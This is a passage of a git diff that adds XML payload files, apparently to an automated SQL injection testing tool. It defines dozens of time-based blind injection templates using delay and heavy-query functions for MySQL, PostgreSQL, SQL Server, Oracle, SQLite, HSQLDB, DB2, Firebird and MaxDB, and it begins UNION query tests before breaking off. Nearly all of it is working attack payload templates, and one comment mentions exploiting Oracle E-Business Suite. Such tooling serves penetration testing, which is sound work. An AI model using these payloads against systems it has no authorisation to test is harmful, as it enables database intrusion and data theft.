+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
+        <request>
+            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- TODO: if possible, add payload for Microsoft Access -->
+    <!-- End of time-based boolean tests -->
+
+    <!-- Time-based boolean tests - Numerous clauses -->
+    <!-- This payload does not work with SLEEP() -->
+    <test>
+        <title>MySQL &gt;= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
+        <request>
+            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
+        <request>
+            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+    <!-- End of time-based boolean tests - Numerous clauses -->
+
+    <!-- Time-based boolean tests - Parameter replace -->
+    <test>
+        <title>MySQL &gt;= 5.0.12 time-based blind - Parameter replace</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 time-based blind - Parameter replace (SELECT)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt;= 5.0.11 time-based blind - Parameter replace (heavy queries)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL time-based blind - Parameter replace (bool)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>([RANDNUM]=[RANDNUM] AND SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL time-based blind - Parameter replace (ELT)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+        <request>
+            <payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 time-based blind - Parameter replace</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <!-- Without parentesis because it never works with them, useful to exploit SQL injection in Oracle E-Business Suite Financials -->
+    <test>
+        <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
+        <request>
+            <payload>BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle time-based blind - Parameter replace (heavy queries)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>
+        <request>
+            <payload>(SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
+        <request>
+            <payload>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+    
+    <!-- Untested -->
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- End of time-based boolean tests - Parameter replace -->
+
+    <!-- Time-based boolean tests - ORDER BY, GROUP BY clause -->
+    <test>
+        <title>MySQL &gt;= 5.0.12 time-based blind - ORDER BY, GROUP BY clause</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt;= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&lt;= 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 time-based blind - ORDER BY, GROUP BY clause</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
+        <request>
+            <payload>,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>    
+    
+    <test>
+        <title>HSQLDB &gt; 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
+        <request>
+            <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- TODO: if possible, add payload for Microsoft Access -->
+    <!-- End of time-based boolean tests - ORDER BY, GROUP BY clause -->
+</root>
diff --git a/xml/payloads/06_union_query.xml b/xml/payloads/06_union_query.xml
new file mode 100644
index 000000000..7de66f9e1
--- /dev/null
+++ b/xml/payloads/06_union_query.xml
@@ -0,0 +1,742 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- UNION query tests -->
+    <test>
+        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
